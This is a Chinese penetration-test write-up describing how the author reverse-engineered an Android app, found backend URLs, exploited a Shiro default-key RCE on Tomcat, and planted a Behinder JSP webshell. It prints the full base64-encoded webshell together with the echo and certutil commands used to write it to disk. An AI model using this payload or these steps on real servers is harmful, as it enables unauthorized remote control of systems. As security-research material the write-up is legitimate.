APP简单逆向到getshell

admin 2022年7月1日02:44:27移动安全APP简单逆向到getshell已关闭评论14 views3000字阅读10分0秒阅读模式

前言

某APP渗透测试,主页就一个登录框,登录框认证调用的公司门户站的SSO单点登录,再加上长亭的waf,几乎牢不可破,常规手法都有尝试,没有什么突破点。

脱壳逆向

jadx一把梭,看看有没有什么敏感信息泄露,审源码的时候发现有爱加密加固,反射大师脱壳一把梭,得到dex文件,然后又jadx一把梭看代码(这个过程就省略了,主题不是它)。

逆向分析

大致粗略的看了一下,用的okhttp框架,有反抓包,直接hook绕过即可正常抓包,数据库密码,阿里osskey之类的也没有硬编码在app中,没有什么敏感信息可以利用,登录验证算法都是调用的单点登录,也没有什么突破点。

图片

突破口

#1 正当没啥进展的时候,乱翻了翻基础类源码,发现BaseUrlConfig类中有一串URL,都是一个ip,但是端口不一样。

推荐一款app信息搜集工具,能主动扫描获取app中的url信息,AppInfoScanner

图片

#2 访问链接,页面空白,由图标得知上面搭载的tomcat。

图片

#3 然后全局搜索http://关键词,又搜到一个url(这次是域名),类似于http://xxxxx:8080/web/weixin/xxxxxx,浏览器打开看了一下,没啥东西,也是空白页面。因为url中出现weixin关键词,推测两种可能,第一种:登陆点,第二种,微信授权接口。
所以简单猜了下路径,在weixin后面加了个login,http://xxxxx:8080/web/weixin/login,发现登陆点,由于路径跟上面发现的url类似,推测它也是java的后端,直接shiro一把梭,默认key,成功rce,java后端rce一般都是system权限。

图片

写入webshell踩坑

RCE之后呢,当然不能只满足现状,为了方便管理,肯定得写个webshell的。

写shell,用的最多的就几种,小马传大马,手动echo写入,远程下载等方式,这里服务器不通外网,也就没法远程下载了,没有上传点,而且小马的代码量跟冰蝎差不多,就不考虑写小马了。

坑1—特殊字符转义

windows服务器写shell,常规做法无非就是echo shell内容 > shell.jsp,shell内容中肯定有特殊字符,用^转义一下就行了,但是这里目标环境是jsp,jsp马跟其他马不一样,内容多,特殊字符多,转义起来麻烦得很,我这里以写冰蝎为例,转义了半天,把所有特殊字符都转义了,先本地测试了一下,能成功写马,但是在shiro工具里就不行…估计跟编码有关,大概试了半个多小时,无果。放弃。

坑2—BASE解码报错

特殊字符多,还有一中办法是先把shell内容base64编码一下,然后在目标机上解码。cmd是有base64解码的功能的,具体可以百度certutil用法。

certutil -decode 1.txt 2.txt //1.txt解码生成2.txt。

情况还是一样的,本地测试成功,在服务器上就是解码失败,输出长度为0,箭头指向的本来是0的,我偷懒就随便找了张图 。


图片

除此之外,什么字符拼接啊,base64一段段输入然后解码啊,全试过了,不是报错就是写不进去或者是base解码输出长度为0,大概率是目标服务器的问题,在这里浪费了大量时间。

成功写入webshell

最后咋解决的呢,最后采用的fuzz大法,把shell内容一段段base64编码上传,然后解码,一段一段的fuzz测试,看到底是那部分字符导致了base解码失败。
最后锁定了冰蝎马的最后四个字符;}%>,不加这四个字符,base64解码能正常输出内容,只要base64编码里是以这四个字符结尾,那么就解码报错。

坑3—根目录webshell不解析

成功写入webshell之后,解码也成功了,webshell地址写在了网站根目录,连接时发现报错,手动访问发现webshell直接变成了下载链接,webshell根本没解析。后来将webshell写入docs目录下才成功解析,因为docs目录是tomcat自带的说明文档目录。

整理思路

1.找到了问题所在,那么就定点打击。思路是:先将除最后四个字符以外的shell内容base编码传到目标上,然后解码输出到2.jsp。

echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KQ>1.txt
certutil -decode 1.txt 2.jsp

2.剩下的四个特殊字符经过echo语句 手动追加到2.jsp末尾

echo ^;^}^%^>>2.jsp

APP简单逆向到getshell

3.最后成功写入docs目录。附上一张连接图


图片

图片

结尾

这波写shell,大概耗时两个多小时,还有很多小细节没说,本地操作不报错并不代表服务器上操作不会报错,环境可能不一样,有时候还有玄学问题,在此之前我也有过shiro写shell的经历,但是那次没这么多问题,一次性base解码写shell成功,而且直接通过文件下载把webshell下载到目标中也行,每个人遇到的环境都可能不一样,最好的方法就是不断fuzz测试,找到报错的原因,然后精准打击。再补充一句…内存马注入也可以,但是任意把站弄崩,别问我怎么知道的,不到万不得已不注入内存马。

最后确认资产的时候没打偏,打到了该公司的一台其他业务的服务器上去了,如果从正面刚APP的话,就算有shiro,也没法绕waf,如果正面无法突破的话,可以尝试搜集一些app内部的敏感信息,说不定有突破口。

来源先知(https://xz.aliyun.com/t/10906#toc-0)


注:如有绘画请联系删除





图片

欢迎大家一起加群讨论学习和交流

图片

快乐要懂得分享,

加倍的快乐。


特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月1日02:44:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  APP简单逆向到getshell http://cn-sec.com/archives/1149543.html